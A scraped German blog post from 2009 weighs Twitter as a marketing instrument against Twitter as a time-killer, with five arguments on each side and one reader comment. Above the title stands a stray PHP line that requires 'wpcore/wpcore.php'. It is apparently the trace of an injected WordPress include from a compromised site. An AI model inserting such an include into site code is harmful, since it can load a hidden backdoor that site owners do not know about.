require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Twitter: Zeitkiller Nr.1 oder wertvolles Marketing-Instrument | Beste-Partnerprogramme.de

Twitter: Zeitkiller Nr.1 oder wertvolles Marketing-Instrument

13. August 2009
By

Tagtäglich stellt sich mir die Frage auf’s Neue, wenn ich morgens statt der Mails erst einmal neue Tweets checke:
Ist twitter ein wichtiges Marketing-Instrument oder eher doch der Zeitkiller Nummer 1.

Für beide Vermutungen gäbe es ausreichend Argumente.

twitter als Marketing-Instrument

twitter macht als Marketing-Instrument durchaus Sinn, ich habe einmal 5 Argumente ausgewählt:

  1. Über twitter finde ich viele spannende Blogs und Artikel, die mir sonst über Feeds oder durch “Googlen” nicht auffallen würden. Insbesondere aufgrund des hohen Vertrauens in meine Follower und die Leute, denen ich selbst folge, haben die Artikel gleich eine ganz andere Gewichtung.
  2. Ich kann meine eigenen Artikel selbst einer “themenaffinen” Leserschaft präsentieren, d.h. Leuten, die sich mit demselben Thema regelmäßig beschäftigen und eigene Erfahrungen, Wissen, etc. beisteuern können und mich so bestätigen oder mir Fehler aufzeigen.
    Über Suchmaschinen würde ich solche Leute nicht finden und die Zahl der Feedleser steigt längst nicht so rasant wie die Zahl der Follower.
  3. Ich kann über twitter in einen ganz anderen Dialog mit meinen Lesern und Followern treten. Sei das durch Retweets oder direkte Nachrichten: Brauche ich Unterstützung, so kann ich die schnell und unkompliziert bekommen. Auch Jobs, etc. mag ich jetzt noch nciht ausschließen.
  4. twitter ist deutlich schneller und effektiver als Google, etc.: Wird ein spannender Beitrag von nur wenigen leuten “retweeted” (wenn ich hier einen falschen Ausdruck verwende, so möge man mich korrigieren), so wird er prinzipiell viel schneller und häufiger gelesen.
    Nach wenigen Minuten können bereits hunderte Leute meinen Beitrag gelesen haben, mit Feeds und Suchmaschinen würde ich das niemals schaffen. Der Beitrag macht in meinem Umfeld innerhalb weniger Minuten die Runde und kann auch Menschen erreichen, die ich mit Suchmaschinen nicht erreiche.
  5. Mein Handeln ist schnell messbar. Über einen Dienst wit bit.ly etwa habe ich mit einem Blick die Möglichkeit zu sehen, wann mein Beitrag/Link aufgerufen wurde. Zwar habe ich dann nicht immer die Möglichkeit zu sehen, aus welchem Umfeld ein Besucher auf den Beitrag gelockt wurde (was beim SEO mit den Keywords ja sehr spannend ist), aber ich habe die Möglichkeit die Wirksamkeit meiner Überschriften zu erkennen.

twitter als Zeitkiller

Jeden Morgen erwische ich mich, dass ich erst tweets und dann Mails checke. twitter kann ein Zeitkiller sein:

  1. Bei nur wenigen Menschen, den man folgt, kann das Aufarbeiten “alter” tweets eine Menge Zeit in Anspruch nehmen: Innerhalb weniger Stunden können beispielsweise mehrere hundert tweets anfallen. Nachts ist das nicht so schlimm – schlafen muss jeder mal -, tagsüber kann es eine wahre Flut an tweets geben.
  2. Mittlerweile kommen auch bei mir beinahe alle 1,5 Minuten mindestens ein neuer tweet an. Der muss dann oftmals relativ zeitnah gelesen werden, dafür lässt man auch mal die wichtige Arbeit ruhen.
  3. Getwitterte Links und Beiträge will ich häufig auch lesen oder wenigstens überfliegen. Je nach Beitragslänge kann das auch dauern.
  4. Retweeten kostet Zeit. Wenn man das nur einmal am Tag macht, so hält sich das noch in Grenzen. Folgt man aber nur 100 Leuten aus dem gleichen Geschäftsbereich, so kann man manchmal viel Zeit nur mit Retweets verbringen.
  5. Findet man selbst einen spannenden Beitrag, so muss man den dann auch unbedingt twittern und dafür die URL kopieren, bei bit.ly umformen, in den Twitterclienten kopieren, sich eine passende Schlagzeile überlegen, twittern, RTs beobachten, die bit.ly-Aufrufstatistik beobachten,…

Ich habe schon mal geschafft, zwei Stunden nur zu twittern. In den zwei Stunden hätte ich auch ganz effizient arbeiten können: Drei Beiträge zu bloggen, beispielsweise…

Eure Meinung

Also, was meint ihr: Ist twitter eher Marketing-Instrument oder Zeitkiller. Oder beides, aber das eine mehr als das andere?
Ich bin gespannt auf eure Antworten!

Tags: , , , , , , , , ,

2 Responses to Twitter: Zeitkiller Nr.1 oder wertvolles Marketing-Instrument

  1. Günter Albers
    25. September 2010 at 19:59

    Ich denke, wer wirklich iInteressantes zu berichten hat, für den ist Twitter eine sehr gute Plattform, es als reines Marketing Instrument zu nutzen ist meiner Meinung nach fragwürdig. Ich persönlich klicke auf Beiträge, die mich neugierig machen, stoße ich aber öfters auf Affiliate oder MLM dann wars das. Wer Twitter für die breite Masse nutzen will, sollte in erster Linie unterhalten, wirklich interessante Links bereitstellen, alles andere sollte eher subtil stattfinden. Hat man einen “spezialisierten” Follower-Kreis sieht das natürlich wieder anders aus. Jedoch ist die Reichweite dann wiederum wesentlich geringer. Ganz auf Twitter sollte man keineswegs verzichten.

Hinterlasse einen Kommentar zu Günter Albers Antworten abbrechen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *